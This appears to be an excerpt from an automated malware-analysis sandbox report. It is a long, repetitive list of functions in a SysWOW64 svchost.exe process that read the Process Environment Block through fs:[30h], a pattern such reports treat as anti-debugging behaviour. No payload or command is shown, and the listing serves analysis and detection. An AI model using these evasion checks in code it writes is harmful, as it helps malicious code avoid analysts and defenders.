Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A020 mov eax, dword ptr fs:[00000030h] 2_2_0542A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C020 mov eax, dword ptr fs:[00000030h] 2_2_0542C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C6030 mov eax, dword ptr fs:[00000030h] 2_2_054C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B20DE mov eax, dword ptr fs:[00000030h] 2_2_054B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0542A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054380E9 mov eax, dword ptr fs:[00000030h] 2_2_054380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B60E0 mov eax, dword ptr fs:[00000030h] 2_2_054B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0542C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054720F0 mov ecx, dword ptr fs:[00000030h] 2_2_054720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543208A mov eax, dword ptr fs:[00000030h] 2_2_0543208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054280A0 mov eax, dword ptr fs:[00000030h] 2_2_054280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C80A8 mov eax, dword ptr fs:[00000030h] 2_2_054C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F60B8 mov eax, dword ptr fs:[00000030h] 2_2_054F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_054F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov ecx, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FA352 mov eax, dword ptr fs:[00000030h] 2_2_054FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D8350 mov ecx, dword ptr fs:[00000030h] 2_2_054D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550634F mov eax, dword ptr fs:[00000030h] 2_2_0550634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D437C mov eax, dword ptr fs:[00000030h] 2_2_054D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A30B mov eax, dword ptr fs:[00000030h] 2_2_0546A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A30B mov eax, dword ptr fs:[00000030h] 2_2_0546A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A30B mov eax, dword ptr fs:[00000030h] 2_2_0546A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C310 mov ecx, dword ptr fs:[00000030h] 2_2_0542C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05450310 mov ecx, dword ptr fs:[00000030h] 2_2_05450310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov eax, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov ecx, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov eax, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov eax, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EC3CD mov eax, dword ptr fs:[00000030h] 2_2_054EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B63C0 mov eax, dword ptr fs:[00000030h] 2_2_054B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov eax, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov eax, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov eax, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D43D4 mov eax, dword ptr fs:[00000030h] 2_2_054D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D43D4 mov eax, dword ptr fs:[00000030h] 2_2_054D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054663FF mov eax, dword ptr fs:[00000030h] 2_2_054663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E388 mov eax, dword ptr fs:[00000030h] 2_2_0542E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E388 mov eax, dword ptr fs:[00000030h] 2_2_0542E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E388 mov eax, dword ptr fs:[00000030h] 2_2_0542E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545438F mov eax, dword ptr fs:[00000030h] 2_2_0545438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545438F mov eax, dword ptr fs:[00000030h] 2_2_0545438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428397 mov eax, dword ptr fs:[00000030h] 2_2_05428397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428397 mov eax, dword ptr fs:[00000030h] 2_2_05428397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428397 mov eax, dword ptr fs:[00000030h] 2_2_05428397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B8243 mov eax, dword ptr fs:[00000030h] 2_2_054B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B8243 mov ecx, dword ptr fs:[00000030h] 2_2_054B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550625D mov eax, dword ptr fs:[00000030h] 2_2_0550625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A250 mov eax, dword ptr fs:[00000030h] 2_2_0542A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436259 mov eax, dword ptr fs:[00000030h] 2_2_05436259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA250 mov eax, dword ptr fs:[00000030h] 2_2_054EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA250 mov eax, dword ptr fs:[00000030h] 2_2_054EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434260 mov eax, dword ptr fs:[00000030h] 2_2_05434260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434260 mov eax, dword ptr fs:[00000030h] 2_2_05434260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434260 mov eax, dword ptr fs:[00000030h] 2_2_05434260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542826B mov eax, dword ptr fs:[00000030h] 2_2_0542826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542823B mov eax, dword ptr fs:[00000030h] 2_2_0542823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055062D6 mov eax, dword ptr fs:[00000030h] 2_2_055062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402E1 mov eax, dword ptr fs:[00000030h] 2_2_054402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402E1 mov eax, dword ptr fs:[00000030h] 2_2_054402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402E1 mov eax, dword ptr fs:[00000030h] 2_2_054402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E284 mov eax, dword ptr fs:[00000030h] 2_2_0546E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E284 mov eax, dword ptr fs:[00000030h] 2_2_0546E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0283 mov eax, dword ptr fs:[00000030h] 2_2_054B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0283 mov eax, dword ptr fs:[00000030h] 2_2_054B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0283 mov eax, dword ptr fs:[00000030h] 2_2_054B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402A0 mov eax, dword ptr fs:[00000030h] 2_2_054402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402A0 mov eax, dword ptr fs:[00000030h] 2_2_054402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430D59 mov eax, dword ptr fs:[00000030h] 2_2_05430D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430D59 mov eax, dword ptr fs:[00000030h] 2_2_05430D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430D59 mov eax, dword ptr fs:[00000030h] 2_2_05430D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C8D6B mov eax, dword ptr fs:[00000030h] 2_2_054C8D6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 mov eax, dword ptr fs:[00000030h] 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 mov eax, dword ptr fs:[00000030h] 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 mov eax, dword ptr fs:[00000030h] 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426D10 mov eax, dword ptr fs:[00000030h] 2_2_05426D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426D10 mov eax, dword ptr fs:[00000030h] 2_2_05426D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426D10 mov eax, dword ptr fs:[00000030h] 2_2_05426D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464D1D mov eax, dword ptr fs:[00000030h] 2_2_05464D1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E8D10 mov eax, dword ptr fs:[00000030h] 2_2_054E8D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E8D10 mov eax, dword ptr fs:[00000030h] 2_2_054E8D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504D30 mov eax, dword ptr fs:[00000030h] 2_2_05504D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B8D20 mov eax, dword ptr fs:[00000030h] 2_2_054B8D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545EDD3 mov eax, dword ptr fs:[00000030h] 2_2_0545EDD3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545EDD3 mov eax, dword ptr fs:[00000030h] 2_2_0545EDD3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4DD7 mov eax, dword ptr fs:[00000030h] 2_2_054B4DD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4DD7 mov eax, dword ptr fs:[00000030h] 2_2_054B4DD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05450DE1 mov eax, dword ptr fs:[00000030h] 2_2_05450DE1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CDEA mov eax, dword ptr fs:[00000030h] 2_2_0542CDEA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CDEA mov eax, dword ptr fs:[00000030h] 2_2_0542CDEA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426DF6 mov eax, dword ptr fs:[00000030h] 2_2_05426DF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545CDF0 mov eax, dword ptr fs:[00000030h] 2_2_0545CDF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545CDF0 mov ecx, dword ptr fs:[00000030h] 2_2_0545CDF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D0DF0 mov eax, dword ptr fs:[00000030h] 2_2_054D0DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D0DF0 mov eax, dword ptr fs:[00000030h] 2_2_054D0DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F8DAE mov eax, dword ptr fs:[00000030h] 2_2_054F8DAE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F8DAE mov eax, dword ptr fs:[00000030h] 2_2_054F8DAE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05466DA0 mov eax, dword ptr fs:[00000030h] 2_2_05466DA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CDB1 mov ecx, dword ptr fs:[00000030h] 2_2_0546CDB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CDB1 mov eax, dword ptr fs:[00000030h] 2_2_0546CDB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CDB1 mov eax, dword ptr fs:[00000030h] 2_2_0546CDB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458DBF mov eax, dword ptr fs:[00000030h] 2_2_05458DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458DBF mov eax, dword ptr fs:[00000030h] 2_2_05458DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504DAD mov eax, dword ptr fs:[00000030h] 2_2_05504DAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436C50 mov eax, dword ptr fs:[00000030h] 2_2_05436C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436C50 mov eax, dword ptr fs:[00000030h] 2_2_05436C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436C50 mov eax, dword ptr fs:[00000030h] 2_2_05436C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464C59 mov eax, dword ptr fs:[00000030h] 2_2_05464C59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4C0F mov eax, dword ptr fs:[00000030h] 2_2_054B4C0F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CC00 mov eax, dword ptr fs:[00000030h] 2_2_0546CC00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EC20 mov eax, dword ptr fs:[00000030h] 2_2_0542EC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054CCC20 mov eax, dword ptr fs:[00000030h] 2_2_054CCC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054CCC20 mov eax, dword ptr fs:[00000030h] 2_2_054CCC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov ecx, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CCC8 mov eax, dword ptr fs:[00000030h] 2_2_0542CCC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428CD0 mov eax, dword ptr fs:[00000030h] 2_2_05428CD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428C8D mov eax, dword ptr fs:[00000030h] 2_2_05428C8D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov ecx, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov eax, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov eax, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov eax, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458CB1 mov eax, dword ptr fs:[00000030h] 2_2_05458CB1
